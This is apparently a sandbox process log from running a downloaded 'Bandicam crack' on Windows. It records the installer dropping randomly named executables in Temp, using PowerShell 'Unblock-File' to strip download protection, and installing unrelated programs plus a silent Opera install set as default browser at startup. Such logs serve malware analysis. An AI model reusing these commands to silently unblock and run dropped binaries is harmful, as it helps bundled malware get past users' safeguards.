"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2196 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2940 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2948 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4292 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4432 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4080,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4520 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4612 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3016 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4748 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2932 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://soneremonasez.shop/7d3d72319e91af47d8ce3e3aa7020fd8qfdWf26J6rD0FKWgXDHPM93vPKgV8Zv6RXI
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4988,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=1280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=1008,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5432,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --field-trial-handle=5720,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5936,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5988 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5956,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --field-trial-handle=6332,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=5952,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6828,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6876 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6916,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6932 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6044,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6064 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6044,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6064 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\Bandicam-Crack-With-_Aba4u2mPXY\Bandicam-Crack-With-_Aba4u2mPXY.exe
"C:\Users\Admin\Downloads\Bandicam-Crack-With-_Aba4u2mPXY\Bandicam-Crack-With-_Aba4u2mPXY.exe"
C:\Users\Admin\AppData\Local\Temp\is-EEARP.tmp\Bandicam-Crack-With-_Aba4u2mPXY.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EEARP.tmp\Bandicam-Crack-With-_Aba4u2mPXY.tmp" /SL5="$20366,6748576,56832,C:\Users\Admin\Downloads\Bandicam-Crack-With-_Aba4u2mPXY\Bandicam-Crack-With-_Aba4u2mPXY.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Sonata_Studio_5241"
C:\Users\Admin\AppData\Local\Sonata Studio\sonatastudio.exe
"C:\Users\Admin\AppData\Local\Sonata Studio\sonatastudio.exe" 53410dcf690dddcd2cb33066fa435f27
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 880
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1096
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1204
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1896
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://totrakto.com/Bandicam-4.5.2-Crack-With-License-code-Free-Download.zip
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2704 -ip 2704
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --field-trial-handle=6812,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6136 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2232
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\X1K6CMDT\yW3xK3wTLI1nF70Y8sUw.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\X1K6CMDT\yW3xK3wTLI1nF70Y8sUw.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\w1diITMZ\ao5WumFEFYqVD7.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\w1diITMZ\ao5WumFEFYqVD7.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe"
C:\Users\Admin\AppData\Local\Temp\X1K6CMDT\yW3xK3wTLI1nF70Y8sUw.exe
C:\Users\Admin\AppData\Local\Temp\X1K6CMDT\yW3xK3wTLI1nF70Y8sUw.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2704 -ip 2704
C:\Users\Admin\AppData\Local\Temp\is-371K3.tmp\yW3xK3wTLI1nF70Y8sUw.tmp
"C:\Users\Admin\AppData\Local\Temp\is-371K3.tmp\yW3xK3wTLI1nF70Y8sUw.tmp" /SL5="$2030A,3820396,54272,C:\Users\Admin\AppData\Local\Temp\X1K6CMDT\yW3xK3wTLI1nF70Y8sUw.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2280
C:\Users\Admin\AppData\Local\Vaer Video Recorder\vaervideorecorder.exe
"C:\Users\Admin\AppData\Local\Vaer Video Recorder\vaervideorecorder.exe" -i
C:\Users\Admin\AppData\Local\Temp\w1diITMZ\ao5WumFEFYqVD7.exe
C:\Users\Admin\AppData\Local\Temp\w1diITMZ\ao5WumFEFYqVD7.exe /sid=3 /pid=39
C:\Users\Admin\AppData\Local\Vaer Video Recorder\vaervideorecorder.exe
"C:\Users\Admin\AppData\Local\Vaer Video Recorder\vaervideorecorder.exe" -s
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2704 -ip 2704
C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe
C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe --silent --allusers=0
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2300
C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe
C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.39 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x725bf308,0x725bf314,0x725bf320
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xCiuUJiRMbdrF.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xCiuUJiRMbdrF.exe" --version
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f0,0x7fffde21ceb8,0x7fffde21cec4,0x7fffde21ced0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2704 -ip 2704
C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe
"C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2736 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240525010636" --session-guid=c3611dd9-8d64-4f71-a985-62d56707a5f1 --server-tracking-blob=YmE5Y2UxY2FkYjk0NmU5YjYwMTIxM2EwMTUxNzM0ZmU2Y2RlZTY3NmIxZWEwMGFlNWUyZTY2NTY5MTkxY2UwMzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxNjU5OTE4OC42MjIxIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiIwYjUzM2ZmMS1jZjU5LTQxNDItOTNlZi05MTdlM2VlODc5ODMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A005000000000000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2320
C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe
C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.39 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x71b0f308,0x71b0f314,0x71b0f320
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2872,i,5793724371325549522,7801053063361162104,262144 --variations-seed-version --mojo-platform-channel-handle=2868 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
